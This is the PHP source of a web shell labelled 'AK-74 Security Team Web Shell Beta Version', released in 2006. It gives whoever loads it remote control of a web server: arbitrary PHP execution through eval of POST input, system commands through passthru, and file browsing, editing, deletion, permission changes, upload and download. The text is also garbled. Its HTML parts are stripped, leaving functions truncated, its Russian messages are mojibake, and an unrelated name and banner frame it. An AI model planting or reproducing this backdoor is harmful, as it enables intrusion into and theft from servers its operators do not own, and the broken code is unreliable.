Van Rixtel

/*                              

.:: :[AK-74 Security Team Web Shell Beta Version]: ::.

- AK-74 Security Team Web Site: www.ak74-team.net
- Released on 01 June 2006.
- Copyright AK-74 Security Team, 2006.
- Thank you for using our script.

*/
error_reporting(0);
set_time_limit(0);
session_start();
$xshell = $SERVER_['PHP_SELF'];
class shell
{

 function getfiles()
 {
  $mas = array();
  $i = 0;
  if ($handle = opendir($_SESSION['currentdir']))
  {
   while (false !== ($file = readdir($handle)))
   if ($file != '..')
    if (!is_dir($_SESSION['currentdir'].'/'.$file))
    {
     $mas[$i]['filename'] = $file;
     $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
     $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
     $i++;
    }
   closedir($handle);
  }
  return $mas;
 }

 function getdirs()
 {
  $mas = array();
  if ($handle = opendir($_SESSION['currentdir']))
  {
   while (false !== ($dir = readdir($handle)))
    if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
     $mas[] = $dir;
   closedir($handle);
  }
  return $mas;
 }

 function geturl()
 {
  if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
   return '/';
  if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
   return '';
  return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
 }

 
 function removefile()
 {
  if (file_exists($_GET['file']))
  {
   chmod($_GET['file'],0777);
   if (unlink($_GET['file']))
    return 'Ôàéë óäàëåí!';
   else
    return 'Ôàéë óäàëåí!';
  }
  else
   return 'Ôàéë íå íàéäåí!';
 }

  function removedir()
 {
   chmod($_GET['dir'],0777);
   if (rmdir($_GET['dir']))
    return 'Äèðåêòîðèÿ óäàëåíà!';
   else
    return 'Äèðåêòîðèÿ íå íàéäåía!';
 }
 
function getmicrotime()
{
 list($usec, $sec) = explode(" ",microtime());
 return ((float)$usec + (float)$sec);
}

function getpermission($path)
{

$perms = fileperms($path);

if (($perms & 0xC000) == 0xC000)
 $info = 's';
elseif (($perms & 0xA000) == 0xA000)
 $info = 'l';
elseif (($perms & 0x8000) == 0x8000)
 $info = '-';
elseif (($perms & 0x6000) == 0x6000)
 $info = 'b';
elseif (($perms & 0x4000) == 0x4000)
 $info = 'd';
elseif (($perms & 0x2000) == 0x2000)
 $info = 'c';
elseif (($perms & 0x1000) == 0x1000)
 $info = 'p';
else
 $info = 'u';

$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));

$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));

$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));

return $info;
}

function getpermissionarray($path)
{
$res = array();
$perms = fileperms($path);

if (($perms & 0xC000) == 0xC000)
 $res[] = 's';
elseif (($perms & 0xA000) == 0xA000)
 $res[] = 'l';
elseif (($perms & 0x8000) == 0x8000)
 $res[] = '-';
elseif (($perms & 0x6000) == 0x6000)
 $res[] = 'b';
elseif (($perms & 0x4000) == 0x4000)
 $res[] = 'd';
elseif (($perms & 0x2000) == 0x2000)
 $res[] = 'c';
elseif (($perms & 0x1000) == 0x1000)
 $res[] = 'p';
else
 $res[] = 'u';

$res[] = (($perms & 0x0100) ? 'r' : '-');
$res[] = (($perms & 0x0080) ? 'w' : '-');
$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));

$res[] = (($perms & 0x0020) ? 'r' : '-');
$res[] = (($perms & 0x0010) ? 'w' : '-');
$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));

$res[] = (($perms & 0x0004) ? 'r' : '-');
$res[] = (($perms & 0x0002) ? 'w' : '-');
$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));

return $res;
}

function outputhead()
{
$res = '';
$res .= '

function outputfilemanager()
{
$res = '';
$number = 0;
$dirs = $this->getdirs();
$files = $this->getfiles();
sort($dirs);
sort($files);

$res .= '
 
 
  Òåêóùàÿ äèðåêòîðèÿ:'.$_SESSION['currentdir'].'
 
 
 
 
    
 
 
    
 
  Ðàçìåð, áàéò
    
 
 
   Ïîñëåäíåå èçìåíåíèå
  
 
  Ïðàâà äîñòóïà
    
 
 
    
 
 
    
 
 ';

for ($i = 0; $i < count($dirs); $i++)
{
 $res .= ''.(++$number).''.$dirs[$i].'  ';
 $res .= ''.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'';
 $res .= ' delete';
}
for ($i = 0; $i < count($files); $i++)
{
 $res .= ''.(++$number).'';
 $res .= ''.$files[$i]['filename'].'';
 $res .= '  '.$files[$i]['filesize'].'';
 $res .= ''.$files[$i]['lastmod'].'';
 $res .= ''.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'';
 $res .= 'edit';
 $res .= 'delete';
}
$res .= '
';

$res .= '

function outputinfo()
{
 $res = '';
 $res .= '

 return $res;
}

function chmodform($file)
{
$perms = $this->getpermissionarray($file);
$res = '';
$res .= '

'
       .'
 

function editfileform($file)
{
$fp = fopen($file,'r');
if (!$fp)
 return 'Ðåäàêòèðîâàíèå ôàéëà';
$res = '';
$res .= '

'
       .'

function executeform()
{
 $res = '';
 $res .= '

 

function execute()
{
echo "

";

eval(stripslashes($_POST['phpcode']));

echo "

function exesysform()
{
 $res = '';
  $res .= '
 

function exesys()
{
echo "

";

$result = passthru($_POST['cmmd']);

echo "

function editfile($file)
{
if (!empty($_POST['rename'])) {
rename ($_POST['file'], $_POST['rename']);
}
 $fp = fopen($_POST['rename'],'w');
 if (!$fp)
  return 0;
 fwrite($fp, stripslashes($_POST['filecontent']));
 fclose($fp);
 return 1;
}
 
function chmodfile($file)
{
 $res = 0;
 switch ($_POST['perms0'])
 {
  case 's':
   $res = $res | 0xC000;
  break;
  case 'l':
   $res = $res | 0xA000;
  break;
  case '-':
   $res = $res | 0x8000;
  break;
  case 'b':
   $res = $res | 0x6000;
  break;
  case 'd':
   $res = $res | 0x4000;
  break;
  case 'c':
   $res = $res | 0x2000;
  break;
  case 'p':
   $res = $res | 0x1000;
  break;
  case 'u':

  break;
 }
if (isset($_POST['perms1']))
 $res = $res | 0x0100;
if (isset($_POST['perms2']))
 $res = $res | 0x0080;
if (isset($_POST['perms3']))
 $res = $res | 0x0040;

if (isset($_POST['perms4']))
 $res = $res | 0x0020;
if (isset($_POST['perms5']))
 $res = $res | 0x0010;
if (isset($_POST['perms6']))
 $res = $res | 0x0008;

if (isset($_POST['perms7']))
 $res = $res | 0x0004;
if (isset($_POST['perms8']))
 $res = $res | 0x0002;
if (isset($_POST['perms9']))
 $res = $res | 0x0001;
echo substr(sprintf('%o', $res), -4);
return chmod($file,intval(substr(sprintf('%o', $res), -4),8));

}

function downloadfile($file)
{
header ("Content-Type: application/octet-stream");
header ("Content-Length: " . filesize($file));
header ("Content-Disposition: attachment; filename=$file");
readfile($file);
die();
}

function createdir()
{
 if (!empty($_POST['dircreate']))
  if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
   return 'Äèðåêòîðèÿ ñîçäàíà!';
   
 return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
}

function createfile()
{
 if (!empty($_POST['filecreate']))
 {
  if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
   return 'Ôàéë óæå ñóùåñòâóåò';
  $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
  if ($fp)
  {
   fclose($fp);
   return 'Ôàéë ñîçäàí!';
  }
 }
   
 return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
}

function uploadfile()
{
 if ($_FILES['filename']['error'] != 0)
  return '121212';
 $_POST['filename2'] = trim($_POST['filename2']);
 if (empty($_POST['filename2']))
  $_POST['filename2'] = $_FILES['filename']['name'];
 if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
  if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
   return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
 return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
}

}
 $shell = new shell();
 $timestart = $shell->getmicrotime();
 $content = '';
 if (!isset($_SESSION['currentdir']))
  $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
 if (isset($_GET['dir']))
 {
  if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
   $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
  Header("Location: $xshell?act=filemanager");
 }

 $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
 if (substr($_SESSION['currentdir'],-1,1) == '/')
  $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);

 switch ($_POST['action'])
 {
  case 'chmod':
   if($shell->chmodfile($_POST['file']))
    $content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
  break;
 
  case 'editfile':
   if ($shell->editfile($_POST['file']))
    $content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
  break;
 
  case 'execute':
   $shell->execute();
  break;
 
  case 'exesys':
   $shell->exesys();
  break;
 
  case 'mkdir':
   $content .= $shell->createdir();
  break;
 
  case 'createfile':
   $content .= $shell->createfile();
  break;
 
  case 'uploadfile':
   $content .= $shell->uploadfile();
  break;
 }
 $content .= $shell->outputhead();
 $content .= $shell->outputmenu();
 
 switch ($_GET['act'])
 {
  case 'edit':
   $content .= $shell->editfileform($_GET['file']);
  break;
 
  case 'chmod':
   $content .= $shell->chmodform($_GET['file']);
  break;
 
  case 'down':
   $content .= $shell->downloadfile($_GET['file']);
  break;
 
  case 'filemanager':
  if ($_GET['act2'] == 'del')
    $content .= $shell->removefile();
    $content .= $shell->outputfilemanager();
  if ($_GET['act3'] == 'del')
    $content .= $shell->removedir();
  break;
 
  case 'phpinfo':
   phpinfo();
   die();
  break;
 
  case 'info':
   $content .= $shell->outputinfo();
  break;
 
  case 'execute':
   $content .= $shell->executeform();
  break;
 
  case 'exesys':
   $content .= $shell->exesysform();
  break;
 }
 
 $content .= $shell->outputdown();
 
 echo $content;
 echo '

                

        ___                         ____      _          _ _        _  _   
 _ __  / _ \__      ___ __  _   _  / __ \ ___| |__   ___| | |_ /\/|| || |_ 
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_  ..  _|
| |_) | |_| |\ V  V /| | | | |_| | | (_| \__ \ | | |  __/ | |_   |_      _|
| .__/ \___/  \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_)    |_||_|  
|_|                         |___/  \____/